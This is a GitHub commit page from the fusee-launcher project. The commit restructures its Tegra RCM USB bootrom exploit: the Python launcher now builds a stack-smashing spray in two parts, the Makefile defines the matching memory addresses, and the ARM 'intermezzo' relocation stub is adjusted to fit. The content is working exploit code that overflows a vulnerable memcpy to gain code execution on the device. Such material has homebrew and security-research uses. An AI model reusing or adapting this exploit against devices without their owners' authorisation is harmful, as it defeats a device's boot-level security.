Permalink
Browse files

Restruct the payload, so it can fit more code

  • Loading branch information...
trisz404 committed May 2, 2018
1 parent e7b42b9 commit 9e0ed49e717eddd6f3e6ce32c1aac02979f5c9da
Showing with 45 additions and 24 deletions.
  1. +14 −8 Makefile
  2. +19 −11 fusee-launcher.py
  3. +12 −5 intermezzo.S
  4. BIN intermezzo.bin
  5. BIN intermezzo.elf
  6. BIN intermezzo.o
@@ -25,27 +25,33 @@ LDFLAGS =

all: intermezzo.bin

# The start of the BPMP IRAM.
START_OF_IRAM := 0x40000000
# The new address of the Intermezzo after copy
INTERMEZZO_RELOCATED_ADDRESS := 0x4000F000

# The address to which Intermezzo is to be loaded by the payload launcher.
INTERMEZZO_ADDRESS := 0x4001F000
INTERMEZZO_ADDRESS := 0x40010000

# The address we want the final payload to be located at.
RELOCATION_TARGET := 0x40010000

# The addrss and length of the data loaded by f-g.
LOAD_BLOCK_START := 0x40020000
LOAD_BLOCK_LENGTH := 0x20000
PAYLOAD_START_ADDR := 0x40010E40
STACK_SPRAY_START := 0x40014E40
STACK_SPRAY_END := 0x40017000
BEFORE_SPRAY_LENGTH := $(shell echo $$(( $(STACK_SPRAY_START) - $(PAYLOAD_START_ADDR) )))
AFTER_SPRAY_LENGTH := 0x30000

ENTRY_POINT_ADDRESS := 0x40010000

# Provide the definitions used in the intermezzo stub.
DEFINES := \
-DSTART_OF_IRAM=$(START_OF_IRAM) \
-DINTERMEZZO_RELOCATED_ADDRESS=$(INTERMEZZO_RELOCATED_ADDRESS) \
-DRELOCATION_TARGET=$(RELOCATION_TARGET) \
-DLOAD_BLOCK_START=$(LOAD_BLOCK_START) \
-DLOAD_BLOCK_LENGTH=$(LOAD_BLOCK_LENGTH) \
-DPAYLOAD_START_ADDR=$(PAYLOAD_START_ADDR) \
-DSTACK_SPRAY_START=$(STACK_SPRAY_START) \
-DSTACK_SPRAY_END=$(STACK_SPRAY_END) \
-DBEFORE_SPRAY_LENGTH=$(BEFORE_SPRAY_LENGTH) \
-DAFTER_SPRAY_LENGTH=$(AFTER_SPRAY_LENGTH) \
-DENTRY_POINT_ADDRESS=$(ENTRY_POINT_ADDRESS)

intermezzo.elf: intermezzo.o
@@ -32,8 +32,9 @@

# specify the locations of important load components
RCM_PAYLOAD_ADDR = 0x40010000
INTERMEZZO_LOCATION = 0x4001F000
PAYLOAD_LOAD_BLOCK = 0x40020000
PAYLOAD_START_ADDR = 0x40010E40
STACK_SPRAY_START = 0x40014E40
STACK_SPRAY_END = 0x40017000

# notes:
# GET_CONFIGURATION to the DEVICE triggers memcpy from 0x40003982
@@ -445,9 +446,6 @@ def parse_usb_id(id):
# Populate from [RCM_PAYLOAD_ADDR, INTERMEZZO_LOCATION) with the payload address.
# We'll use this data to smash the stack when we execute the vulnerable memcpy.
print("\nSetting ourselves up to smash the stack...")
repeat_count = int((INTERMEZZO_LOCATION - RCM_PAYLOAD_ADDR) / 4)
intermezzo_location_raw = INTERMEZZO_LOCATION.to_bytes(4, byteorder='little')
payload += (intermezzo_location_raw * repeat_count)

# Include the Intermezzo binary in the command stream. This is our first-stage
# payload, and it's responsible for relocating the final payload to 0x40010000.
@@ -458,15 +456,25 @@ def parse_usb_id(id):
payload += intermezzo


# Finally, pad until we've reached the position we need to put the payload.
# This ensures the payload winds up at the location Intermezzo expects.
position = INTERMEZZO_LOCATION + intermezzo_size
padding_size = PAYLOAD_LOAD_BLOCK - position
# Pad the payload till the start of the payload
padding_size = PAYLOAD_START_ADDR - (RCM_PAYLOAD_ADDR + intermezzo_size)
payload += (b'\0' * padding_size)

# Read the payload into memory.
target_payload = b''
# Read the rest of the payload into memory.
with open(payload_path, "rb") as f:
payload += f.read()
target_payload = f.read()

# First part of the payload
padding_size = STACK_SPRAY_START - PAYLOAD_START_ADDR
payload += target_payload[:padding_size]

# Gap in the payload, stack spray
repeat_count = int((STACK_SPRAY_END - STACK_SPRAY_START) / 4)
payload += (RCM_PAYLOAD_ADDR.to_bytes(4, byteorder='little') * repeat_count)

# Read the rest of the payload into memory.
payload += target_payload[padding_size:]

# Pad the payload to fill a USB request exactly, so we don't send a short
# packet and break out of the RCM loop.
@@ -8,15 +8,15 @@
_start:

// First, we'll need to move ourselves _out_ of the target area.
// We'll copy down into the start of the IRAM.
ldr r0, =START_OF_IRAM
// We'll copy down into the IRAM.
ldr r0, =INTERMEZZO_RELOCATED_ADDRESS
ldr r1, =post_relocation
ldr r2, =intermezzo_end
sub r2, r2, r1
bl copy

// Jump to the start of RAM, which should now contain the post-relocation code.
ldr r0, =START_OF_IRAM
ldr r0, =INTERMEZZO_RELOCATED_ADDRESS
bx r0


@@ -25,8 +25,15 @@ post_relocation:

// Next, we'll copy our payload down to the appropriate relocaiton address.
ldr r0, =RELOCATION_TARGET
ldr r1, =LOAD_BLOCK_START
ldr r2, =LOAD_BLOCK_LENGTH
ldr r1, =PAYLOAD_START_ADDR
ldr r2, =BEFORE_SPRAY_LENGTH
bl copy

ldr r0, =RELOCATION_TARGET
ldr r1, =BEFORE_SPRAY_LENGTH
add r0, r0, r1
ldr r1, =STACK_SPRAY_END
ldr r2, =AFTER_SPRAY_LENGTH
bl copy

// Finally, jump into the relocated target.
BIN -92 Bytes intermezzo.bin
Binary file not shown.
BIN -60.6 KB intermezzo.elf
Binary file not shown.
BIN -872 Bytes intermezzo.o
Binary file not shown.

0 comments on commit 9e0ed49

Please sign in to comment.